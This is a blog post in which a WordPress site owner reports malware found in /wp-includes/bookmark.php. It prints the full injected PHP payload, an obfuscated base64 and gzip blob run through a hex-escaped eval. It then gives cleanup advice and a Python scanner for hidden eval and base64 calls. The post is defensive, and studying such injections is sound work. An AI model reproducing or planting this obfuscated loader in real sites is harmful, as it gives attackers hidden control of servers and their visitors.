Malware in WordPress

Summary

I recently had problems on one of my sites that run WordPress. The code below was maliciously injected by some virus/malware that managed to find a flaw in WordPress or in some plugin that I use on my site.
I will post here the code I found in the file /wp-includes/bookmark.php:

<?php $njjybh = array("eNqtWQlz4kbT/iv","EtbU2XxyvRgegeL","UvPsDGa/BrDBjYb","FGAxCmOQmI5Nvvf","v57umZE4vEkqbxJ","LYqbnmb67Z5IY9h","Jnv/SW0244nE1b3","noYhMHZaaFwmkwm","vifkRKJQOHs3TH5","/13auFov25uz0NH","FxWnm1U+3XNf8MG","i8Z7XF0xb/7n+/4","q/StU+fva/4Y8Id","75/PXsHNX5e90Ic","dfrPJSrfb519ONu","XriH5vrevvVGvPP","juFuCzmrWrhtLIs","3Y+f0HLfu6vyZn/","Bnkz9qNn+GHb3sA","0nHuMatOvzh20P+","atRL+KuJ3PkbIGv","f88+yhoi3s2+PK/","7l4Cbnp4VNZgSvx","5UciH6I1/NraYQc","kKCI88gf1fWgM3F","Z49XFvVA4FB2V4X","eQIca6KOyq33w10","/hd4Q9thRij6uqW","v5/5YyYFf9ZR0GV","nUhu5dwr9W2c06z","/r62+Rcqqlm772G","ZbdPs/gExm+Qfso","If/LvxDkYVO4yfw","qZEQ5CKqh57X2K/","+yl3XQEExX7pADF","LzBHyh8mT/mqHPd","5K9UgT+vHNwMuXD","oheJIhuC/h2HRKA","0boyIqIIfu9IDKK","lpPL7jD6KnSnRS2","/BNdBmnQmnxd5Yr","F1uB8sYJ0sCaiL9","40kOcSKrnv7ItSJ","xGA/ZTQNQ7UHl6Q","MVbgK0qjZvdxVND","QmrXV8nXbCNG6Nd","Yp3qDirHqNv9CVl","vzxur0Kn2ragi/n","v7cPaOvHUU6r31i","dIuJrG1RjLVgpJ6","r4Li1l3UdfjMMYf","38m/yttyxIKPamE","HMEShNIWHJ5E1yy","01EsgzUGOW+uSq9","U6xaHG6mI5CYTLV","RBxCFjuKCHKoIcm","LUcPDMhrUbm++xl","NgnAYl3H5cWdX7J","yzFNM1VN8CGd3ZG","fVzIAC6wwNwUVyh","GomMLPASvqUy9I/","tAKYF0xX8IBK2kg","ZTTNcRVqiRP6SRS","RfktAUNjXdjguNJ","lTbJMn6gnEFuBZx","IIdBQFdQKCJIzij","5x8FSRhi1sSoJxV","FtuU+e73F5zL2TF","fORlxVHOVGrJczQ","dNIvTxVFhy5ch2f","ZZ8U3p2iIRTXibG","1KPL70K1xcpcks7","diusS0ygVxorshm","iod3QW/hX3GOuBe","p4DTthWD4JORC9J","rQw5rzqXBMk8vNG","eDrwYyF/jE896xK","FpB9LnYIilLQlzK","C4lMHY9umKdFlBa","j5kFf0oWmnDgtCK","uVH65GxWVxz16VY","pxxKKKVL0mbiCGy","9Pvo/GRQYGUnJLu","UyDb74uja6F1A9C","r8jAirtGtNFGugU","YUhNSb4rbq8gqTe","ktW+kSxUoXdwBFK","cWoDXImipJfcTKO","KJ0sskKR6xB3Ajs","vnyrPNO12VXoCF4","g2y60pAlARlItQ+","hx6+a3yyS2PdhSF","+DOKVzHnKgslNLj","2tyWhx2KlSKEtkX","wZLxplqngQVLek1","zGhSkRQjPScWqA/","VgYq6F+3OUyxSi6","VN0QmQyZUxKJGOO","wI3WRb5JBEGs9Wp","A7MbFgGZQIkD5Nx","F/nv021NxZz0H1U","7EAphCeJKhqwIIm","GzyH8w+XLOxO7xF","ExqwmHOgVlS6Dyq","iibZUYQxJTyV7Mh","5dEwUkCTQSyKzW1","AMxU7IbORzGB/xZ","QaPvNdtX5SaiHyk","arwuUupeSipKtVk","kW1/KFgt/XE4pSe
","6IiWRNu6rGhS8TS","6LdInImtKxJrUXx","o8tYl8w9UpjpsUo","EWsMSc8gUom6ipd","Qx1g+0GFdJTB50N","rlsGy3r7yh+lNtT","QdVQzZrQIDlYQ7Y","Lb2uvqmoEtoLKbt","puakG18IiQVUe5e","FT3i1EDUhZhXBBB","1N2S9lSpV6VDhXG","DJy6TmJBeLUJX1P","Od0BVJbQ8iZgRLl","vqiz7oy+o/UadVs","RC6gSv5TRRgkzoH","o3/aSB8+4qnWFnF","66HUSh6+81I7F+Z","XRloDEqeREFz7wW","mcX+TmGmKfIWLJ+","VKub50m0jUkNTOE","6B8Uxcov6D51Jy5","3ivgUlupXJ81DGY","qpmoFKicoqUhE7l","d0YpSg5yPl9bnFZ","HK3IfkshGmuimrH","IafhuT8c2xJXUfT","TVkDWLEWpUvuc/F","orYjKvLO8HKthxY","3wdDBjUeZ3Ktw+V","pinnfSIcIZqXyo5","RzFZ2AifWseqjiT","VFEd90YA8W7HMKX","qBQcyEQrF4UF5ho","QTtlFTHvetm5C/R","2RVNM9ZkEJcq18L","quXWJOwbGz5gsfW","XupQWziH2BXB5r6","EREjmTjDR0QJ93K","elxYlZ4VE7xX4CR","xy1L5xp5vW+pHYQ","HF73HUZ7tOUdCKu","yI98d6atxCyL0Dp","ccc1iYkdEcWjK/1","jVWIx/8AlRdH87R","8aAlrO+e5aKvtF5","4ijsVnpa6rbHFGz","J082uGNNHYRkBQY","5FHNP8RCpiBRNWV","ClaMEYOa9qHYA52","TJE9R6SqIP3GmUl","V/dKKRFjRrfxYN/","U1/yipKuvWXcqTu","q0R4fuSZaNic1DU","L6Mh4GrrzgR7mpc","42G/eVfbyCsZPHH","bQ2yDjGcndr/SvV","NZL2i/1pYuNX0NA","xWx6US3BN27AU8T","bSxN1tjDM8Q1nqH","ar3jC39Bh/YHUc3","7q6vameX+9oXsYS","NSAqw8G3cn6m3uP","l0EuatU1ukbZ71L","8Ia/3vtZWFyB0qy","JEcesPQefOHyJDm","ADiPPIZ1wBU+Lz3","lx4J496784ZeC5r","1gtphopJg2JisqU","wQAx7WsPwS9GfiY","owpvzNBvbkTf+PW","MR91XvOBq+c3aDs","6b7iqQtPtkkvm41","M93Ky2bdYhPsf5a","fPV0uq3c7qIwz2K","/XrFzrSf4xdd6GR","+OHisz68fa2hX19","tWg16052OUu9Dnh","ib/rOXYM75qaNvq","lSLgM+Wc/6Iuzm5","iiu/vb96981dNId","wqPtEh22DsdpB/z","FrVcY1uctDxy/m6","ls+V86j3l3y5Ws3","btapWe6ljAOTvy1","WMoypfqZVeXmrXV","ZXzNFVMHiq52hPq","pcrIbpJ3KTT6mKW","RNjFeHjeWRjFzRc","zHJYNJ6jjQmVFDs","+bzTkp7uVMyoau/","srHMK5gqr+gALk6","tt+JnhAHldFWMzI","8/xaG0glpeFSObi","HQlKaSm5T2LPkDL","ezemyhWvzYlqlic","qSrR9Z9Ab/F6wM6","nxRFGuPbyIyzKxQ","yNyo5vI9AVirHNn","L4VlZXxRvF73KDh","rg2YkIES239Cx++","y5BpDcqfJMZHnkM","OioEMmPT5OXCy9c","LqaJTjvwUmbL9bo","z1zt71/7ybvg1ef","kj8SMx7B25BO8Ov","O64tZq3Bl7bbfmz","tnuaTH5XV+KH02f","J78eBursLu2fvfL","+lJb/zF3MKhTMte","QkrDxcuF35rOB2G","fD0n1h01dJa8xO/",
"AC2fzEBH1c6Zpmn","5O6EemTf18MVtOX","djv6GpDTv/KLPjv","OJFtx+i0C4v/Jd9","ghmWQGYbi/XKWBc","ZbfS88A5FZMvnnn","/EBPQn/fM8e4lh6","bDt9/w+2/nFkUSo","TyfIr7HXJhw1Sn7","f2yAS6YLvrzwJPj","gCnSJv4xXESvbYf","eMnvwoFw/PLHDw8","GE8cM1gtm3fFs7k","25wfr+rNP2cZGJ2","2tOEC5aC2/ut7se","F9lInsPTTEqLAeR","84fVbk3bYHXACK3","l+gnMnwgEsB38Ku","Ky3nvvcl4E0pVBo","Dp9fpLm/XtLqOAN","IwRlI01KLrISfiT","//TNAHKAFIMmp/+","GGDyvmPlAOmG8yC","sLOZticCEOa4er7","/hEABMU0gpR2lOS","RKKeOZ/D/ij3zJj","uzKvRgE8toTbvtW","OJx4syU5QFpR6eC","hsb+kMnBaxJ/mnN","zlKkLa+0rlvx/Yh","fbH4o/pySXNJy6c","k3sQ4nekOZgqez1","v4S1+TwzCcP77hw","9IhGh7lFyPjCVjS","6uBt/jtqu9NBTY7","tgJcsjdfgneRXDS","ZvFwNhr4HycabSX","GEPIwv7IHig31Na","GYGHzxkepHPpwVL","bMefmEFaZywCEGH","EdIdmYu4llGoKJn","QH/db82FkkPnyi5","x9TmjohmwPNXjgw","E+MBEg/tHAVjtJX","KOF/FTsYeLxDsX2","MuCPMcMgUiSyxDK","opWGnFqMaYj9W4s","srQIRpBA6Ho3Alk","m4vtIDCJjR1bZfy","NwzX1V6RqqSme7W","zKTS6uLX4erpE3N","czKWrIyqJAldxPI","dY5DwaNTrDmbcJX","VYCBkv5BNHC57rh","dc7JY8PkPItYiAl","bJB22vj/kzmqRSK","l6JWmV4ZeNr4Mkt","pg9NLpRVnUIOcxC","MUgFINQDEIxCMUk","FJNQTEIxRS4mFJN","QTEIxCcUkFJNQLE","KxCMUiFItQLEKxC","MUiFItQLEKxCCVF","KClCSRFKilBShJI","ilBShpAglRSgpQk","kTSppQ0oSSJpQ0o","aQJJU0oaUJJE0qa","UDKEkiGUDKFkCCV","DKBlCyRBKhlAyhJ","IhFJtQbEKxCcUmF","JtQbEKxCcUmFDsj","s0sm8gmbMKGTEG8","m3rp4G+ItModmiX","dKvNPinRFvgccEH","hN4TOAxgSczERN4","TOAxgccEHhN4Ihy","ZLvB0gacLPF3g6Z","YU0nIwu8Szn/B8p","ot6DJsTre2Ei6V3","2ZtBqYNcRIGTaAc","Yn7A1xCBUoP7w7I","QGTmSMiSCzHWxjL","juwfhzlQTu5g5hR","iCxCpN+SnVhH9FP","gRHvq/kIAKFBGCb","S3cHdJAtKVLzoAo","P3oyMxpXKTUP+mf","/TrAjycy+/KNdLW","YtBa9Vg/q6U7Sio","ZJDbrowQ2Hj014u","yEnZJ3STYf3MO5w","IWeS36lQIz+8paQ","JywGVuYrO5K2vxL","CAjCq/nXz/PrE7B","ikQxoZBjC+u1e5g","MnPFz6hBMlPyD9x","uOfWH07FcArrADi","DGwuWPcLYU3qDTK","UI3xCv5lu6CTcAb","+FboTeYtANvR4P7","kWSQktobe9Bu1Gt","CgJ2Om0lOXx+n0v","0lnHNAJIs4JtKJn","rVa+8JhrtTDgoHT","Q+QtUKgUjehAmrr","aUKpggjOpo+bB0N","OF2x3XlrXe0461p","uWhE9Qx2KoZow4H","RcCMJUG9H8Dw8WW","ajAw31hxBwlwJyN","BtOSSfigMDnsJwf","Q
wwGnk/nI3XizDj","ZaFTy8xOETQA6Rq","5mnVYQthf8pJqlY","bVcIgMJ94/ubAq2","g+VACUMQQHAk89r","Ts59sNG8HQThYLA","+2khP/YrMsxNfCC","2bLhTgm6baTnavT","CWgZNZrGE2vcdhn","Vl2dVYw5RLImgM8","/2eOCLidhRhqcAO","MjOY0dRO8bQofiL","WbdFJ83374/zKyk","kz1RVoz7aiP3z85","9J51NC1WQm2igGf","VSSfMrQ9hRh0on/","kG2UHlk+nAKFnap","8GVOgoX352fn/6x","vq3Vn2D2T9emAVd","d4/wjQ/Z/0bef4J","Y7uCqhPeX+nnUB7","yjT1XkylsEE78YO","51h22/O2gvRCrkW","QOPbQYjC4szhgFn","wdZLrlzLlb/guCG","OLGxv3BTjhrE3Yc","kJPK6EM3+28qgms","egyRhf3ELyUiasJ","pobScsgw1FhGFYD","p0vcxow6DwAvP3r","Vunp4+F3JfSBipV","MNysoflSl2IQFaW","ZPHUD1Yh3lMOzSY","ucHc7fguyN2nRRQ","84xF65MWTDBh1Gd","rfF4EUhOxnLYg2U","tG0aCDHET2j4w+K","ETtD8xivbWy2GoQ","CglGXpOB5ZHnLYZ","TZqHozo4gXa0Iu0","dfTFMahViG271y5","ko17CsH42mdqfPN","BNtEnynxjBwqblx","/9A1ccVZDGW/Ddy","UjRBXXLbIR0ALFP","eU9rxUXlmMDVHqo","KI6KbIZGo4BL/dm","aKLGsP+LZYgrL2H","yNRHFC7hTP0EIoz","EyCQ+UYTBqVY0pz","D2UYylk0cIM0cI7","SOEKe2QMMXwUniv","FUejQPt0spgkflv","0EoLf/zuhW55De/","NS9Za9D2KJFmC8p","P4iXoDsH8XLG54g","Wg4eru1OJOP798d","EYfzenI8Gw60nhz","7GLrvpX1mRTSM6T","jNxs8DE1QITdwss","lZI+Zjq06MsCDmS","yWUhGUiaTXxMXkk","Q5VdraexylMvf/5","O0W5F5xAwVlQl0l","qjMPnOvAMfb+7w1","S7J9I/7Z5GYmdOU","yTdG9pnfzc7rFLU","cviN8v8+Vd2jk2a","7MAJsMmI1yxMEGb","Kye5KTh6x08kKJx","AmTJMOpOPTYEaci","ONHflNdIkDB4ieM","bLgYUpMOA6BZKr3","CjzJ0CyHO+j/EOT","sbXe2dC3JlwExCW","ichAhvO+TDEcUQm","Pxp09htWMfQ/pkf","sIq8lWVpLJi7Ela","fXpv/LxO/EJmEr7","s2/Qgnmf8nYzfjB","H4RP4uLkY9BdDOd","hItzMPec09Nbhh1","H7W5tGTz+RgT5+o","N+f+N09VJx4m5Qm","dbzZe2TbrttqY+N","I7IoA5bd2B2zHwh","DiZ+8PGL5M/OfT/","wMqkxHY");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x6E\x6A\x6A\x79\x62\x68\x29\x29\x29\x29\x3B");?>

Tip for solving the problem

In these cases, the useful thing to do is download your entire site to your local machine and search it for the following terms: iframe, eval, base64_encode, base64_decode.
If the search returns any results, check whether the code found is something you do not recognize. If so, remove the code and then install the Sucuri Scanner plugin, available in the official WordPress plugin directory.
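A plain-text search for base64_decode does not match the injected line shown above: only the outer eval is literal, and the inner call is written as \xNN escapes inside the string passed to it. The following is an added example, not the author's code (function names and the sample data are constructed for illustration), that resolves PHP hex and octal string escapes before searching for the four terms:

```python
import re
from pathlib import Path

# Terms the post recommends searching for.
TERMS = ("iframe", "eval", "base64_encode", "base64_decode")
TERM_RE = re.compile(r"(?<![A-Za-z0-9_])(" + "|".join(TERMS) + r")(?![A-Za-z0-9_])", re.I)
# PHP double-quoted string escapes: \xHH (hex) and \NNN (octal).
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def unescape_php(text):
    """Resolve hex and octal escapes so hidden function names become visible."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE_RE.sub(repl, text)


def scan_text(text):
    """Return sorted (line_no, term, how); how is 'plain' or 'escaped'."""
    hits = set()
    for no, line in enumerate(text.splitlines(), 1):
        plain = {m.group(1).lower() for m in TERM_RE.finditer(line)}
        decoded = {m.group(1).lower() for m in TERM_RE.finditer(unescape_php(line))}
        hits |= {(no, term, "plain") for term in plain}
        hits |= {(no, term, "escaped") for term in decoded - plain}
    return sorted(hits)


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Scan a local copy of the site; returns {relative_path: hits}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed sample shaped like the injection above; the array is a harmless placeholder.
HIDDEN = "".join("\\x%02X" % ord(c) for c in 'eval(gzuncompress(base64_decode(implode("",$a))));')
SAMPLE = '<?php $a = array("AAAA","BBBB");eval("' + HIDDEN + '");?>\n<?php echo "hi"; ?>\n'

if __name__ == "__main__":
    for hit in scan_text(SAMPLE):
        print(hit)  # plain hits, plus terms visible only after unescaping
```

Run scan_tree on the downloaded copy of the site. Legitimate code also uses these functions, so each hit still needs the manual review described above.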

I hope this has helped someone. Until next time, everyone.

About the author
Felipe Marques is a Web and Mobile Systems Consultant and Analyst with more than 10 years of experience.
  1. Marcus MJM

    Felipe Marques!

    My banner was deactivated; I have new banners, so update it over there. Thanks. http://www.buenosarro.com
